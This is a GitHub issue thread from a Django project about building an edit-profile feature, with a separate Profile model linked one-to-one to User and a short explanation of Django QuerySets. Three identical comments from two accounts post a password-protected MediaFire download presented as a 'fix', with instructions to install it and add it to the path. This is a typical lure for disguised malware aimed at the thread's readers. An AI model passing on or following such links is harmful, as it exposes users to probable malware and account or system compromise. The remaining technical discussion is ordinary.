### ISSUE TITLE
Edit profile functionality + UI

### ISSUE THREAD

**Issue by rehan-ankalgi-7t2** [rehan-ankalgi-7t2/vichar-sagar-django#6]
for this functionality, i am using an approach that keeps profile data and user auth data seperate.
- User essential data for auth is managed by the core User model from django auth
- instead of extending the core User model, I am modelling a seperate Model `Profile`.
- `Profile` model holds all the essential fields for the profile like pfp, bio, social handles etc.
- `Profile` will be associated to a user through a `One-to-One` relationship with the core User model
- this will remove the necessity for extending the core User model and writing all the functionality again.

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by deviserops** [comment]
Hi @rehan-ankalgi-7t2 

Accoring to your requirement if you want to keep all saperate with the user auth and other project related stuff.
This might help : https://pypi.org/project/dj-all-auth/
GIthub: https://github.com/deviserops/dj-all-auth

**Comment by rehan-ankalgi-7t2** [comment]
> Hi @rehan-ankalgi-7t2
> 
> Accoring to your requirement if you want to keep all saperate with the user auth and other project related stuff. This might help : https://pypi.org/project/dj-all-auth/ GIthub: https://github.com/deviserops/dj-all-auth

thanks for sharing this library!!

**Comment by rehan-ankalgi-7t2** [comment]
Edit prodile feature done ✅, need to handle file upload

**Comment by rehan-ankalgi-7t2** [comment]
### pfp upload bug fixed, edit profile functionality complete

The `Profile.objects.filter(user=request.user)` method returns a **QuerySet**, which is a collection of database objects (in this case, `Profile` instances) that match the provided filter condition (`user=request.user`).

### Key Characteristics of `QuerySet`:
- **Lazy Evaluation**: QuerySets are lazy, meaning they don't hit the database until they're actually evaluated (e.g., when iterated over, sliced, or converted to a list).
- **Collection of Objects**: Even if only one `Profile` object matches the filter, it still returns a QuerySet (which could contain zero, one, or multiple objects).
- **Empty QuerySet**: If no objects match the filter condition, the QuerySet will be empty.
  
### Example:
```python
existing_profile = Profile.objects.filter(user=request.user)

# Check if any profiles exist for the user
if existing_profile.exists():
    # Get the first (and presumably only) profile for the user
    profile = existing_profile.first()
else:
    # Handle case where no profile exists
    profile = None
```

### Differences from `get()`:
- `.filter()` returns a QuerySet and can return multiple or zero objects.
- `.get()` returns a single object and raises a `DoesNotExist` exception if no object is found, or a `MultipleObjectsReturned` exception if more than one object matches the query.

In summary, `.filter()` returns a **QuerySet** that can contain zero, one, or more objects, depending on the filter conditions.
